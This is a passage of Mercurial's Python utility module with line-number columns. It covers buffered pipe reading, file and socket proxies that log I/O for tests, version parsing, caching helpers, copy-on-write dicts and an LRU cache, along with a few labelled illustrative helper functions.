367 365 self._lenbuf = len(self._buffer[0])
368 366 lfi = -1
369 367 if self._buffer:
370 368 lfi = self._buffer[-1].find('\n')
371 369 while (not self._eof) and lfi < 0:
372 370 self._fillbuffer()
373 371 if self._buffer:
374 372 lfi = self._buffer[-1].find('\n')
375 373 size = lfi + 1
376 374 if lfi < 0: # end of file
377 375 size = self._lenbuf
378 376 elif 1 < len(self._buffer):
379 377 # we need to take previous chunks into account
380 378 size += self._lenbuf - len(self._buffer[-1])
381 379 return self._frombuffer(size)
382 380
383 381 def _frombuffer(self, size):
384 382 """return at most 'size' data from the buffer
385 383
386 384 The data are removed from the buffer."""
387 385 if size == 0 or not self._buffer:
388 386 return ''
389 387 buf = self._buffer[0]
390 388 if 1 < len(self._buffer):
391 389 buf = ''.join(self._buffer)
392 390
393 391 data = buf[:size]
394 392 buf = buf[len(data):]
395 393 if buf:
396 394 self._buffer = [buf]
397 395 self._lenbuf = len(buf)
398 396 else:
399 397 self._buffer = []
400 398 self._lenbuf = 0
401 399 return data
402 400
403 401 def _fillbuffer(self):
404 402 """read data to the buffer"""
405 403 data = os.read(self._input.fileno(), _chunksize)
406 404 if not data:
407 405 self._eof = True
408 406 else:
409 407 self._lenbuf += len(data)
410 408 self._buffer.append(data)
411 409
412 410 return data
413 411
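# Illustrative sketch (added for illustration, not part of the module):
# the intended collaboration between bufferedinputpipe and polling.
# 'hasbuffer' must be consulted first, because already-buffered data will
# not wake select() up. The helper name is hypothetical.
def _examplepollline(pipe, timeout=1.0):
    import select
    if not pipe.hasbuffer:
        r, _w, _x = select.select([pipe.fileno()], [], [], timeout)
        if not r:
            return None  # nothing ready within the timeout
    return pipe.readline()
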
414 412 def mmapread(fp):
415 413 try:
416 414 fd = getattr(fp, 'fileno', lambda: fp)()
417 415 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 416 except ValueError:
419 417 # Empty files cannot be mmapped, but mmapread should still work. Check
420 418 # if the file is empty, and if so, return an empty buffer.
421 419 if os.fstat(fd).st_size == 0:
422 420 return ''
423 421 raise
424 422
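# Illustrative sketch (added for illustration, not part of the module):
# mmapread() returns a buffer-like object that can be sliced lazily,
# without reading the whole file into memory. The path is hypothetical.
def _examplemmap(path):
    with open(path, 'rb') as fp:
        data = mmapread(fp)
        return data[:4]  # e.g. peek at a magic number via the mapping
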
425 423 class fileobjectproxy(object):
426 424 """A proxy around file objects that tells a watcher when events occur.
427 425
428 426 This type is intended to only be used for testing purposes. Think hard
429 427 before using it in important code.
430 428 """
431 429 __slots__ = (
432 430 r'_orig',
433 431 r'_observer',
434 432 )
435 433
436 434 def __init__(self, fh, observer):
437 435 object.__setattr__(self, r'_orig', fh)
438 436 object.__setattr__(self, r'_observer', observer)
439 437
440 438 def __getattribute__(self, name):
441 439 ours = {
442 440 r'_observer',
443 441
444 442 # IOBase
445 443 r'close',
446 444 # closed if a property
447 445 r'fileno',
448 446 r'flush',
449 447 r'isatty',
450 448 r'readable',
451 449 r'readline',
452 450 r'readlines',
453 451 r'seek',
454 452 r'seekable',
455 453 r'tell',
456 454 r'truncate',
457 455 r'writable',
458 456 r'writelines',
459 457 # RawIOBase
460 458 r'read',
461 459 r'readall',
462 460 r'readinto',
463 461 r'write',
464 462 # BufferedIOBase
465 463 # raw is a property
466 464 r'detach',
467 465 # read defined above
468 466 r'read1',
469 467 # readinto defined above
470 468 # write defined above
471 469 }
472 470
473 471 # We only observe some methods.
474 472 if name in ours:
475 473 return object.__getattribute__(self, name)
476 474
477 475 return getattr(object.__getattribute__(self, r'_orig'), name)
478 476
479 477 def __nonzero__(self):
480 478 return bool(object.__getattribute__(self, r'_orig'))
481 479
482 480 __bool__ = __nonzero__
483 481
484 482 def __delattr__(self, name):
485 483 return delattr(object.__getattribute__(self, r'_orig'), name)
486 484
487 485 def __setattr__(self, name, value):
488 486 return setattr(object.__getattribute__(self, r'_orig'), name, value)
489 487
490 488 def __iter__(self):
491 489 return object.__getattribute__(self, r'_orig').__iter__()
492 490
493 491 def _observedcall(self, name, *args, **kwargs):
494 492 # Call the original object.
495 493 orig = object.__getattribute__(self, r'_orig')
496 494 res = getattr(orig, name)(*args, **kwargs)
497 495
498 496 # Call a method on the observer of the same name with arguments
499 497 # so it can react, log, etc.
500 498 observer = object.__getattribute__(self, r'_observer')
501 499 fn = getattr(observer, name, None)
502 500 if fn:
503 501 fn(res, *args, **kwargs)
504 502
505 503 return res
506 504
507 505 def close(self, *args, **kwargs):
508 506 return object.__getattribute__(self, r'_observedcall')(
509 507 r'close', *args, **kwargs)
510 508
511 509 def fileno(self, *args, **kwargs):
512 510 return object.__getattribute__(self, r'_observedcall')(
513 511 r'fileno', *args, **kwargs)
514 512
515 513 def flush(self, *args, **kwargs):
516 514 return object.__getattribute__(self, r'_observedcall')(
517 515 r'flush', *args, **kwargs)
518 516
519 517 def isatty(self, *args, **kwargs):
520 518 return object.__getattribute__(self, r'_observedcall')(
521 519 r'isatty', *args, **kwargs)
522 520
523 521 def readable(self, *args, **kwargs):
524 522 return object.__getattribute__(self, r'_observedcall')(
525 523 r'readable', *args, **kwargs)
526 524
527 525 def readline(self, *args, **kwargs):
528 526 return object.__getattribute__(self, r'_observedcall')(
529 527 r'readline', *args, **kwargs)
530 528
531 529 def readlines(self, *args, **kwargs):
532 530 return object.__getattribute__(self, r'_observedcall')(
533 531 r'readlines', *args, **kwargs)
534 532
535 533 def seek(self, *args, **kwargs):
536 534 return object.__getattribute__(self, r'_observedcall')(
537 535 r'seek', *args, **kwargs)
538 536
539 537 def seekable(self, *args, **kwargs):
540 538 return object.__getattribute__(self, r'_observedcall')(
541 539 r'seekable', *args, **kwargs)
542 540
543 541 def tell(self, *args, **kwargs):
544 542 return object.__getattribute__(self, r'_observedcall')(
545 543 r'tell', *args, **kwargs)
546 544
547 545 def truncate(self, *args, **kwargs):
548 546 return object.__getattribute__(self, r'_observedcall')(
549 547 r'truncate', *args, **kwargs)
550 548
551 549 def writable(self, *args, **kwargs):
552 550 return object.__getattribute__(self, r'_observedcall')(
553 551 r'writable', *args, **kwargs)
554 552
555 553 def writelines(self, *args, **kwargs):
556 554 return object.__getattribute__(self, r'_observedcall')(
557 555 r'writelines', *args, **kwargs)
558 556
559 557 def read(self, *args, **kwargs):
560 558 return object.__getattribute__(self, r'_observedcall')(
561 559 r'read', *args, **kwargs)
562 560
563 561 def readall(self, *args, **kwargs):
564 562 return object.__getattribute__(self, r'_observedcall')(
565 563 r'readall', *args, **kwargs)
566 564
567 565 def readinto(self, *args, **kwargs):
568 566 return object.__getattribute__(self, r'_observedcall')(
569 567 r'readinto', *args, **kwargs)
570 568
571 569 def write(self, *args, **kwargs):
572 570 return object.__getattribute__(self, r'_observedcall')(
573 571 r'write', *args, **kwargs)
574 572
575 573 def detach(self, *args, **kwargs):
576 574 return object.__getattribute__(self, r'_observedcall')(
577 575 r'detach', *args, **kwargs)
578 576
579 577 def read1(self, *args, **kwargs):
580 578 return object.__getattribute__(self, r'_observedcall')(
581 579 r'read1', *args, **kwargs)
582 580
583 581 class observedbufferedinputpipe(bufferedinputpipe):
584 582 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
585 583
586 584 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
587 585 bypass ``fileobjectproxy``. Because of this, we need to make
588 586 ``bufferedinputpipe`` aware of these operations.
589 587
590 588 This variation of ``bufferedinputpipe`` can notify observers about
591 589 ``os.read()`` events. It also re-publishes other events, such as
592 590 ``read()`` and ``readline()``.
593 591 """
594 592 def _fillbuffer(self):
595 593 res = super(observedbufferedinputpipe, self)._fillbuffer()
596 594
597 595 fn = getattr(self._input._observer, r'osread', None)
598 596 if fn:
599 597 fn(res, _chunksize)
600 598
601 599 return res
602 600
603 601 # We use different observer methods because the operation isn't
604 602 # performed on the actual file object but on us.
605 603 def read(self, size):
606 604 res = super(observedbufferedinputpipe, self).read(size)
607 605
608 606 fn = getattr(self._input._observer, r'bufferedread', None)
609 607 if fn:
610 608 fn(res, size)
611 609
612 610 return res
613 611
614 612 def readline(self, *args, **kwargs):
615 613 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
616 614
617 615 fn = getattr(self._input._observer, r'bufferedreadline', None)
618 616 if fn:
619 617 fn(res)
620 618
621 619 return res
622 620
623 621 PROXIED_SOCKET_METHODS = {
624 622 r'makefile',
625 623 r'recv',
626 624 r'recvfrom',
627 625 r'recvfrom_into',
628 626 r'recv_into',
629 627 r'send',
630 628 r'sendall',
631 629 r'sendto',
632 630 r'setblocking',
633 631 r'settimeout',
634 632 r'gettimeout',
635 633 r'setsockopt',
636 634 }
637 635
638 636 class socketproxy(object):
639 637 """A proxy around a socket that tells a watcher when events occur.
640 638
641 639 This is like ``fileobjectproxy`` except for sockets.
642 640
643 641 This type is intended to only be used for testing purposes. Think hard
644 642 before using it in important code.
645 643 """
646 644 __slots__ = (
647 645 r'_orig',
648 646 r'_observer',
649 647 )
650 648
651 649 def __init__(self, sock, observer):
652 650 object.__setattr__(self, r'_orig', sock)
653 651 object.__setattr__(self, r'_observer', observer)
654 652
655 653 def __getattribute__(self, name):
656 654 if name in PROXIED_SOCKET_METHODS:
657 655 return object.__getattribute__(self, name)
658 656
659 657 return getattr(object.__getattribute__(self, r'_orig'), name)
660 658
661 659 def __delattr__(self, name):
662 660 return delattr(object.__getattribute__(self, r'_orig'), name)
663 661
664 662 def __setattr__(self, name, value):
665 663 return setattr(object.__getattribute__(self, r'_orig'), name, value)
666 664
667 665 def __nonzero__(self):
668 666 return bool(object.__getattribute__(self, r'_orig'))
669 667
670 668 __bool__ = __nonzero__
671 669
672 670 def _observedcall(self, name, *args, **kwargs):
673 671 # Call the original object.
674 672 orig = object.__getattribute__(self, r'_orig')
675 673 res = getattr(orig, name)(*args, **kwargs)
676 674
677 675 # Call a method on the observer of the same name with arguments
678 676 # so it can react, log, etc.
679 677 observer = object.__getattribute__(self, r'_observer')
680 678 fn = getattr(observer, name, None)
681 679 if fn:
682 680 fn(res, *args, **kwargs)
683 681
684 682 return res
685 683
686 684 def makefile(self, *args, **kwargs):
687 685 res = object.__getattribute__(self, r'_observedcall')(
688 686 r'makefile', *args, **kwargs)
689 687
690 688 # The file object may be used for I/O. So we turn it into a
691 689 # proxy using our observer.
692 690 observer = object.__getattribute__(self, r'_observer')
693 691 return makeloggingfileobject(observer.fh, res, observer.name,
694 692 reads=observer.reads,
695 693 writes=observer.writes,
696 694 logdata=observer.logdata,
697 695 logdataapis=observer.logdataapis)
698 696
699 697 def recv(self, *args, **kwargs):
700 698 return object.__getattribute__(self, r'_observedcall')(
701 699 r'recv', *args, **kwargs)
702 700
703 701 def recvfrom(self, *args, **kwargs):
704 702 return object.__getattribute__(self, r'_observedcall')(
705 703 r'recvfrom', *args, **kwargs)
706 704
707 705 def recvfrom_into(self, *args, **kwargs):
708 706 return object.__getattribute__(self, r'_observedcall')(
709 707 r'recvfrom_into', *args, **kwargs)
710 708
711 709 def recv_into(self, *args, **kwargs):
712 710 return object.__getattribute__(self, r'_observedcall')(
713 711 r'recv_into', *args, **kwargs)
714 712
715 713 def send(self, *args, **kwargs):
716 714 return object.__getattribute__(self, r'_observedcall')(
717 715 r'send', *args, **kwargs)
718 716
719 717 def sendall(self, *args, **kwargs):
720 718 return object.__getattribute__(self, r'_observedcall')(
721 719 r'sendall', *args, **kwargs)
722 720
723 721 def sendto(self, *args, **kwargs):
724 722 return object.__getattribute__(self, r'_observedcall')(
725 723 r'sendto', *args, **kwargs)
726 724
727 725 def setblocking(self, *args, **kwargs):
728 726 return object.__getattribute__(self, r'_observedcall')(
729 727 r'setblocking', *args, **kwargs)
730 728
731 729 def settimeout(self, *args, **kwargs):
732 730 return object.__getattribute__(self, r'_observedcall')(
733 731 r'settimeout', *args, **kwargs)
734 732
735 733 def gettimeout(self, *args, **kwargs):
736 734 return object.__getattribute__(self, r'_observedcall')(
737 735 r'gettimeout', *args, **kwargs)
738 736
739 737 def setsockopt(self, *args, **kwargs):
740 738 return object.__getattribute__(self, r'_observedcall')(
741 739 r'setsockopt', *args, **kwargs)
742 740
743 741 class baseproxyobserver(object):
744 742 def _writedata(self, data):
745 743 if not self.logdata:
746 744 if self.logdataapis:
747 745 self.fh.write('\n')
748 746 self.fh.flush()
749 747 return
750 748
751 749 # Simple case writes all data on a single line.
752 750 if b'\n' not in data:
753 751 if self.logdataapis:
754 752 self.fh.write(': %s\n' % stringutil.escapestr(data))
755 753 else:
756 754 self.fh.write('%s> %s\n'
757 755 % (self.name, stringutil.escapestr(data)))
758 756 self.fh.flush()
759 757 return
760 758
761 759 # Data with newlines is written to multiple lines.
762 760 if self.logdataapis:
763 761 self.fh.write(':\n')
764 762
765 763 lines = data.splitlines(True)
766 764 for line in lines:
767 765 self.fh.write('%s> %s\n'
768 766 % (self.name, stringutil.escapestr(line)))
769 767 self.fh.flush()
770 768
771 769 class fileobjectobserver(baseproxyobserver):
772 770 """Logs file object activity."""
773 771 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
774 772 logdataapis=True):
775 773 self.fh = fh
776 774 self.name = name
777 775 self.logdata = logdata
778 776 self.logdataapis = logdataapis
779 777 self.reads = reads
780 778 self.writes = writes
781 779
782 780 def read(self, res, size=-1):
783 781 if not self.reads:
784 782 return
785 783 # Python 3 can return None from reads at EOF instead of empty strings.
786 784 if res is None:
787 785 res = ''
788 786
789 787 if self.logdataapis:
790 788 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
791 789
792 790 self._writedata(res)
793 791
794 792 def readline(self, res, limit=-1):
795 793 if not self.reads:
796 794 return
797 795
798 796 if self.logdataapis:
799 797 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
800 798
801 799 self._writedata(res)
802 800
803 801 def readinto(self, res, dest):
804 802 if not self.reads:
805 803 return
806 804
807 805 if self.logdataapis:
808 806 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
809 807 res))
810 808
811 809 data = dest[0:res] if res is not None else b''
812 810 self._writedata(data)
813 811
814 812 def write(self, res, data):
815 813 if not self.writes:
816 814 return
817 815
818 816 # Python 2 returns None from some write() calls. Python 3 (reasonably)
819 817 # returns the number of bytes written.
820 818 if res is None and data:
821 819 res = len(data)
822 820
823 821 if self.logdataapis:
824 822 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
825 823
826 824 self._writedata(data)
827 825
828 826 def flush(self, res):
829 827 if not self.writes:
830 828 return
831 829
832 830 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
833 831
834 832 # For observedbufferedinputpipe.
835 833 def bufferedread(self, res, size):
836 834 if not self.reads:
837 835 return
838 836
839 837 if self.logdataapis:
840 838 self.fh.write('%s> bufferedread(%d) -> %d' % (
841 839 self.name, size, len(res)))
842 840
843 841 self._writedata(res)
844 842
845 843 def bufferedreadline(self, res):
846 844 if not self.reads:
847 845 return
848 846
849 847 if self.logdataapis:
850 848 self.fh.write('%s> bufferedreadline() -> %d' % (
851 849 self.name, len(res)))
852 850
853 851 self._writedata(res)
854 852
855 853 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
856 854 logdata=False, logdataapis=True):
857 855 """Turn a file object into a logging file object."""
858 856
859 857 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
860 858 logdata=logdata, logdataapis=logdataapis)
861 859 return fileobjectproxy(fh, observer)
862 860
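# Illustrative sketch (added for illustration, not part of the module):
# wrapping file objects so all I/O API calls are logged to another handle,
# e.g. 'src> read(4096) -> 4096'. The names used are hypothetical.
def _exampleloggedcopy(logfh, src, dst):
    rfh = makeloggingfileobject(logfh, src, 'src', writes=False)
    wfh = makeloggingfileobject(logfh, dst, 'dst', reads=False)
    while True:
        chunk = rfh.read(4096)
        if not chunk:
            break
        wfh.write(chunk)
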
863 861 class socketobserver(baseproxyobserver):
864 862 """Logs socket activity."""
865 863 def __init__(self, fh, name, reads=True, writes=True, states=True,
866 864 logdata=False, logdataapis=True):
867 865 self.fh = fh
868 866 self.name = name
869 867 self.reads = reads
870 868 self.writes = writes
871 869 self.states = states
872 870 self.logdata = logdata
873 871 self.logdataapis = logdataapis
874 872
875 873 def makefile(self, res, mode=None, bufsize=None):
876 874 if not self.states:
877 875 return
878 876
879 877 self.fh.write('%s> makefile(%r, %r)\n' % (
880 878 self.name, mode, bufsize))
881 879
882 880 def recv(self, res, size, flags=0):
883 881 if not self.reads:
884 882 return
885 883
886 884 if self.logdataapis:
887 885 self.fh.write('%s> recv(%d, %d) -> %d' % (
888 886 self.name, size, flags, len(res)))
889 887 self._writedata(res)
890 888
891 889 def recvfrom(self, res, size, flags=0):
892 890 if not self.reads:
893 891 return
894 892
895 893 if self.logdataapis:
896 894 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
897 895 self.name, size, flags, len(res[0])))
898 896
899 897 self._writedata(res[0])
900 898
901 899 def recvfrom_into(self, res, buf, size, flags=0):
902 900 if not self.reads:
903 901 return
904 902
905 903 if self.logdataapis:
906 904 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
907 905 self.name, size, flags, res[0]))
908 906
909 907 self._writedata(buf[0:res[0]])
910 908
911 909 def recv_into(self, res, buf, size=0, flags=0):
912 910 if not self.reads:
913 911 return
914 912
915 913 if self.logdataapis:
916 914 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
917 915 self.name, size, flags, res))
918 916
919 917 self._writedata(buf[0:res])
920 918
921 919 def send(self, res, data, flags=0):
922 920 if not self.writes:
923 921 return
924 922
925 923 self.fh.write('%s> send(%d, %d) -> %d' % (
926 924 self.name, len(data), flags, len(res)))
927 925 self._writedata(data)
928 926
929 927 def sendall(self, res, data, flags=0):
930 928 if not self.writes:
931 929 return
932 930
933 931 if self.logdataapis:
934 932 # Returns None on success. So don't bother reporting return value.
935 933 self.fh.write('%s> sendall(%d, %d)' % (
936 934 self.name, len(data), flags))
937 935
938 936 self._writedata(data)
939 937
940 938 def sendto(self, res, data, flagsoraddress, address=None):
941 939 if not self.writes:
942 940 return
943 941
944 942 if address:
945 943 flags = flagsoraddress
946 944 else:
947 945 flags = 0
948 946
949 947 if self.logdataapis:
950 948 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
951 949 self.name, len(data), flags, address, res))
952 950
953 951 self._writedata(data)
954 952
955 953 def setblocking(self, res, flag):
956 954 if not self.states:
957 955 return
958 956
959 957 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
960 958
961 959 def settimeout(self, res, value):
962 960 if not self.states:
963 961 return
964 962
965 963 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
966 964
967 965 def gettimeout(self, res):
968 966 if not self.states:
969 967 return
970 968
971 969 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
972 970
973 971 def setsockopt(self, res, level, optname, value):
974 972 if not self.states:
975 973 return
976 974
977 975 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
978 976 self.name, level, optname, value, res))
979 977
980 978 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
981 979 logdata=False, logdataapis=True):
982 980 """Turn a socket into a logging socket."""
983 981
984 982 observer = socketobserver(logh, name, reads=reads, writes=writes,
985 983 states=states, logdata=logdata,
986 984 logdataapis=logdataapis)
987 985 return socketproxy(fh, observer)
988 986
989 987 def version():
990 988 """Return version information if available."""
991 989 try:
992 990 from . import __version__
993 991 return __version__.version
994 992 except ImportError:
995 993 return 'unknown'
996 994
997 995 def versiontuple(v=None, n=4):
998 996 """Parses a Mercurial version string into an N-tuple.
999 997
1000 998 The version string to be parsed is specified with the ``v`` argument.
1001 999 If it isn't defined, the current Mercurial version string will be parsed.
1002 1000
1003 1001 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1004 1002 returned values:
1005 1003
1006 1004 >>> v = b'3.6.1+190-df9b73d2d444'
1007 1005 >>> versiontuple(v, 2)
1008 1006 (3, 6)
1009 1007 >>> versiontuple(v, 3)
1010 1008 (3, 6, 1)
1011 1009 >>> versiontuple(v, 4)
1012 1010 (3, 6, 1, '190-df9b73d2d444')
1013 1011
1014 1012 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1015 1013 (3, 6, 1, '190-df9b73d2d444+20151118')
1016 1014
1017 1015 >>> v = b'3.6'
1018 1016 >>> versiontuple(v, 2)
1019 1017 (3, 6)
1020 1018 >>> versiontuple(v, 3)
1021 1019 (3, 6, None)
1022 1020 >>> versiontuple(v, 4)
1023 1021 (3, 6, None, None)
1024 1022
1025 1023 >>> v = b'3.9-rc'
1026 1024 >>> versiontuple(v, 2)
1027 1025 (3, 9)
1028 1026 >>> versiontuple(v, 3)
1029 1027 (3, 9, None)
1030 1028 >>> versiontuple(v, 4)
1031 1029 (3, 9, None, 'rc')
1032 1030
1033 1031 >>> v = b'3.9-rc+2-02a8fea4289b'
1034 1032 >>> versiontuple(v, 2)
1035 1033 (3, 9)
1036 1034 >>> versiontuple(v, 3)
1037 1035 (3, 9, None)
1038 1036 >>> versiontuple(v, 4)
1039 1037 (3, 9, None, 'rc+2-02a8fea4289b')
1040 1038
1041 1039 >>> versiontuple(b'4.6rc0')
1042 1040 (4, 6, None, 'rc0')
1043 1041 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1044 1042 (4, 6, None, 'rc0+12-425d55e54f98')
1045 1043 >>> versiontuple(b'.1.2.3')
1046 1044 (None, None, None, '.1.2.3')
1047 1045 >>> versiontuple(b'12.34..5')
1048 1046 (12, 34, None, '..5')
1049 1047 >>> versiontuple(b'1.2.3.4.5.6')
1050 1048 (1, 2, 3, '.4.5.6')
1051 1049 """
1052 1050 if not v:
1053 1051 v = version()
1054 1052 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1055 1053 if not m:
1056 1054 vparts, extra = '', v
1057 1055 elif m.group(2):
1058 1056 vparts, extra = m.groups()
1059 1057 else:
1060 1058 vparts, extra = m.group(1), None
1061 1059
1062 1060 vints = []
1063 1061 for i in vparts.split('.'):
1064 1062 try:
1065 1063 vints.append(int(i))
1066 1064 except ValueError:
1067 1065 break
1068 1066 # (3, 6) -> (3, 6, None)
1069 1067 while len(vints) < 3:
1070 1068 vints.append(None)
1071 1069
1072 1070 if n == 2:
1073 1071 return (vints[0], vints[1])
1074 1072 if n == 3:
1075 1073 return (vints[0], vints[1], vints[2])
1076 1074 if n == 4:
1077 1075 return (vints[0], vints[1], vints[2], extra)
1078 1076
1079 1077 def cachefunc(func):
1080 1078 '''cache the result of function calls'''
1081 1079 # XXX doesn't handle keywords args
1082 1080 if func.__code__.co_argcount == 0:
1083 1081 cache = []
1084 1082 def f():
1085 1083 if len(cache) == 0:
1086 1084 cache.append(func())
1087 1085 return cache[0]
1088 1086 return f
1089 1087 cache = {}
1090 1088 if func.__code__.co_argcount == 1:
1091 1089 # we gain a small amount of time because
1092 1090 # we don't need to pack/unpack the list
1093 1091 def f(arg):
1094 1092 if arg not in cache:
1095 1093 cache[arg] = func(arg)
1096 1094 return cache[arg]
1097 1095 else:
1098 1096 def f(*args):
1099 1097 if args not in cache:
1100 1098 cache[args] = func(*args)
1101 1099 return cache[args]
1102 1100
1103 1101 return f
1104 1102
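# Illustrative sketch (added for illustration, not part of the module):
# cachefunc memoizes forever, so it only suits pure functions with a
# bounded argument space. The function below is hypothetical.
def _examplecachefunc():
    def square(n):
        return n * n  # stands in for an expensive computation
    cached = cachefunc(square)
    cached(12)         # computed and stored
    return cached(12)  # served from the cache; square() is not called
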
1105 1103 class cow(object):
1106 1104 """helper class to make copy-on-write easier
1107 1105
1108 1106 Call preparewrite before doing any writes.
1109 1107 """
1110 1108
1111 1109 def preparewrite(self):
1112 1110 """call this before writes, return self or a copied new object"""
1113 1111 if getattr(self, '_copied', 0):
1114 1112 self._copied -= 1
1115 1113 return self.__class__(self)
1116 1114 return self
1117 1115
1118 1116 def copy(self):
1119 1117 """always do a cheap copy"""
1120 1118 self._copied = getattr(self, '_copied', 0) + 1
1121 1119 return self
1122 1120
1123 1121 class sortdict(collections.OrderedDict):
1124 1122 '''a simple sorted dictionary
1125 1123
1126 1124 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1127 1125 >>> d2 = d1.copy()
1128 1126 >>> d2
1129 1127 sortdict([('a', 0), ('b', 1)])
1130 1128 >>> d2.update([(b'a', 2)])
1131 1129 >>> list(d2.keys()) # should still be in last-set order
1132 1130 ['b', 'a']
1133 1131 '''
1134 1132
1135 1133 def __setitem__(self, key, value):
1136 1134 if key in self:
1137 1135 del self[key]
1138 1136 super(sortdict, self).__setitem__(key, value)
1139 1137
1140 1138 if pycompat.ispypy:
1141 1139 # __setitem__() isn't called as of PyPy 5.8.0
1142 1140 def update(self, src):
1143 1141 if isinstance(src, dict):
1144 1142 src = src.iteritems()
1145 1143 for k, v in src:
1146 1144 self[k] = v
1147 1145
1148 1146 class cowdict(cow, dict):
1149 1147 """copy-on-write dict
1150 1148
1151 1149 Be sure to call d = d.preparewrite() before writing to d.
1152 1150
1153 1151 >>> a = cowdict()
1154 1152 >>> a is a.preparewrite()
1155 1153 True
1156 1154 >>> b = a.copy()
1157 1155 >>> b is a
1158 1156 True
1159 1157 >>> c = b.copy()
1160 1158 >>> c is a
1161 1159 True
1162 1160 >>> a = a.preparewrite()
1163 1161 >>> b is a
1164 1162 False
1165 1163 >>> a is a.preparewrite()
1166 1164 True
1167 1165 >>> c = c.preparewrite()
1168 1166 >>> b is c
1169 1167 False
1170 1168 >>> b is b.preparewrite()
1171 1169 True
1172 1170 """
1173 1171
1174 1172 class cowsortdict(cow, sortdict):
1175 1173 """copy-on-write sortdict
1176 1174
1177 1175 Be sure to call d = d.preparewrite() before writing to d.
1178 1176 """
1179 1177
1180 1178 class transactional(object):
1181 1179 """Base class for making a transactional type into a context manager."""
1182 1180 __metaclass__ = abc.ABCMeta
1183 1181
1184 1182 @abc.abstractmethod
1185 1183 def close(self):
1186 1184 """Successfully closes the transaction."""
1187 1185
1188 1186 @abc.abstractmethod
1189 1187 def release(self):
1190 1188 """Marks the end of the transaction.
1191 1189
1192 1190 If the transaction has not been closed, it will be aborted.
1193 1191 """
1194 1192
1195 1193 def __enter__(self):
1196 1194 return self
1197 1195
1198 1196 def __exit__(self, exc_type, exc_val, exc_tb):
1199 1197 try:
1200 1198 if exc_type is None:
1201 1199 self.close()
1202 1200 finally:
1203 1201 self.release()
1204 1202
1205 1203 @contextlib.contextmanager
1206 1204 def acceptintervention(tr=None):
1207 1205 """A context manager that closes the transaction on InterventionRequired
1208 1206
1209 1207 If no transaction was provided, this simply runs the body and returns
1210 1208 """
1211 1209 if not tr:
1212 1210 yield
1213 1211 return
1214 1212 try:
1215 1213 yield
1216 1214 tr.close()
1217 1215 except error.InterventionRequired:
1218 1216 tr.close()
1219 1217 raise
1220 1218 finally:
1221 1219 tr.release()
1222 1220
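# Illustrative sketch (added for illustration, not part of the module):
# with acceptintervention, an InterventionRequired exception closes
# (commits) the transaction instead of aborting it, then propagates.
# 'maketx' and 'dowork' are hypothetical.
def _exampleintervention(maketx, dowork):
    tr = maketx()  # some transactional object, or None
    with acceptintervention(tr):
        dowork()   # may raise error.InterventionRequired
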
1223 1221 @contextlib.contextmanager
1224 1222 def nullcontextmanager():
1225 1223 yield
1226 1224
1227 1225 class _lrucachenode(object):
1228 1226 """A node in a doubly linked list.
1229 1227
1230 1228 Holds a reference to nodes on either side as well as a key-value
1231 1229 pair for the dictionary entry.
1232 1230 """
1233 1231 __slots__ = (u'next', u'prev', u'key', u'value')
1234 1232
1235 1233 def __init__(self):
1236 1234 self.next = None
1237 1235 self.prev = None
1238 1236
1239 1237 self.key = _notset
1240 1238 self.value = None
1241 1239
1242 1240 def markempty(self):
1243 1241 """Mark the node as emptied."""
1244 1242 self.key = _notset
1245 1243
1246 1244 class lrucachedict(object):
1247 1245 """Dict that caches most recent accesses and sets.
1248 1246
1249 1247 The dict consists of an actual backing dict - indexed by original
1250 1248 key - and a doubly linked circular list defining the order of entries in
1251 1249 the cache.
1252 1250
1253 1251 The head node is the newest entry in the cache. If the cache is full,
1254 1252 we recycle head.prev and make it the new head. Cache accesses result in
1255 1253 the node being moved to before the existing head and being marked as the
1256 1254 new head node.
1257 1255 """
1258 1256 def __init__(self, max):
1259 1257 self._cache = {}
1260 1258
1261 1259 self._head = head = _lrucachenode()
1262 1260 head.prev = head
1263 1261 head.next = head
1264 1262 self._size = 1
1265 1263 self._capacity = max
1266 1264
1267 1265 def __len__(self):
1268 1266 return len(self._cache)
1269 1267
1270 1268 def __contains__(self, k):
1271 1269 return k in self._cache
1272 1270
1273 1271 def __iter__(self):
1274 1272 # We don't have to iterate in cache order, but why not.
1275 1273 n = self._head
1276 1274 for i in range(len(self._cache)):
1277 1275 yield n.key
1278 1276 n = n.next
1279 1277
1280 1278 def __getitem__(self, k):
1281 1279 node = self._cache[k]
1282 1280 self._movetohead(node)
1283 1281 return node.value
1284 1282
1285 1283 def __setitem__(self, k, v):
1286 1284 node = self._cache.get(k)
1287 1285 # Replace existing value and mark as newest.
1288 1286 if node is not None:
1289 1287 node.value = v
1290 1288 self._movetohead(node)
1291 1289 return
1292 1290
1293 1291 if self._size < self._capacity:
1294 1292 node = self._addcapacity()
1295 1293 else:
1296 1294 # Grab the last/oldest item.
1297 1295 node = self._head.prev
1298 1296
1299 1297 # At capacity. Kill the old entry.
1300 1298 if node.key is not _notset:
1301 1299 del self._cache[node.key]
1302 1300
1303 1301 node.key = k
1304 1302 node.value = v
1305 1303 self._cache[k] = node
1306 1304 # And mark it as newest entry. No need to adjust order since it
1307 1305 # is already self._head.prev.
1308 1306 self._head = node
1309 1307
1310 1308 def __delitem__(self, k):
1311 1309 node = self._cache.pop(k)
1312 1310 node.markempty()
1313 1311
